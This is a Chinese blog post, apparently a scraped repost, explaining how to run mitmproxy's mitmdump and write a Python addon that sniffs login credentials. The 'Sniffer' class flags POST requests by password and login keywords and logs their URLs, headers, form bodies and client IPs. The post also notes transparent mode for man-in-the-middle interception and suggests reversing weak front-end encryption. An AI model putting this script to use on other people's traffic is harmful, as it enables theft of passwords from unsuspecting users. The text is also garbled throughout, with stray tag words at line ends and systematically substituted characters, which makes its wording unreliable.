好久没有写文章了,一是没空,二是几乎忘了还有这回事。这篇应该是年前的最后一发吧!那么今天就来聊一聊我最近关于网络抓包的一些实践(其实我对网络安全领域知之甚少)。固然,你们最熟知的工具多是 Wireshark,它的功能十分强大。不过它大概不支持热插拔脚本,也就没办法实现彻底自有掌控的抓包。因而不就以后,Mitmproxy 这货进入了个人视线,用它能够方便的添加自定义抓取逻辑的 Python 脚本,能够说很是容易扩展,完美的解决了个人需求。这也是写完 Keykee 以后,再一次将这一傻式编程语言应用到生产实践中。前端
忽然想起了本身入行这两年的一个感悟:python
程序员有时候应该感谢给本身提需求的人。git
Mitmdump 是 Mitmproxy 的一个分支,它就是实现根据自定义的脚本进行 dump 的核心工具。若是就是在本身机器上玩一玩的话,使用常规模式 (Regular Mode) 便可。关于 Mitmproxy 这几种模式的详细介绍能够看官方文档,这是常规模式的原理图:程序员
若是有中间人攻击的因素在里面的话须要配合 Linux 的 ip_forward,而且使用 Mitmdump 的透明模式( Transparent Mode),它对客户端来讲是不可见的:编程
一般状况下,常规和透明这两种模式能够知足大部分的实验需求。浏览器
Mitmdump 能够经过 pip 安装:安全
$ pip install mitmproxy
复制代码
安装完以后就能够在任何地方使用 mitmdump
命令操做了。bash
若是须要抓取 https 请求的话,须要在系统中导入 Mitmproxy 的根证书,若是只在某个浏览器中实验的的话,也能够直接在浏览器中导入。证书的默认位置在 ~/.mitmproxy
目录下。网络
而后设置系统的网络代理,根据须要设置“对全部协议使用相同代理”。代理 ip 为 127.0.0.1,代理端口为 8080。编程语言
这样,准备工做就作好了。
此次尝试编写一个密码嗅探的脚本,前面提到了,它的扩展性很是强!!!因此我这里就抛砖引玉了。
import logging
from mitmproxy import http
password_key = ["password", "pwd", "pass", "passwd", "mm", "passport", "auth", "key", "mima"]
form_login_key = ["check", "login", "verify", "account", "logon", "signin", "denglu"]
class Sniffer:
def request(self, flow: http.HTTPFlow):
request = flow.request
url = request.pretty_url
form_url = str(request.urlencoded_form)
if request.method == 'POST':
if self.any_match(form_login_key, url) or self.any_match(password_key, form_url):
self.resolve(flow)
def any_match(self, list, str: str):
lower_str = str.lower()
for i in list:
if i in lower_str:
return True
return False
def resolve(self, flow: http.HTTPFlow):
request = flow.request
url = request.url
_from = str(flow.client_conn.ip_address)
url_form = str(request.urlencoded_form)
header = str(request.headers)
logging.info("url: %s \nheader: %s \nform: %s \nip_from: %s", url, header, url_form, _from)
复制代码
Mitmdump 会建立一个 Sniffer
类的实例,并调用 request(flow)
方法,它能够一次插入多个这样的 class,只须要提供一个统一的入口便可:
from sniffer import Sniffer
addons = [
Sniffer()
# YourSniffer()
# ...
]
复制代码
最后,执行mitmdump
命令开始抓包:
$ mitmdump -q -s addons.py --set body-size-limit=10k "~m post"
复制代码
启动以后访问一个本身认为安全性相对较差的站点,进行用户登陆的操做,而后控制台里出现了用户名密码等信息,若是通过加密了,找到这个页面的前端代码研究一下加密方式,安全性较差的站点很容易就能搞明白。
最后,欢迎来个人摆码王子的小屋作客!
各位朋友,新春愉快 : )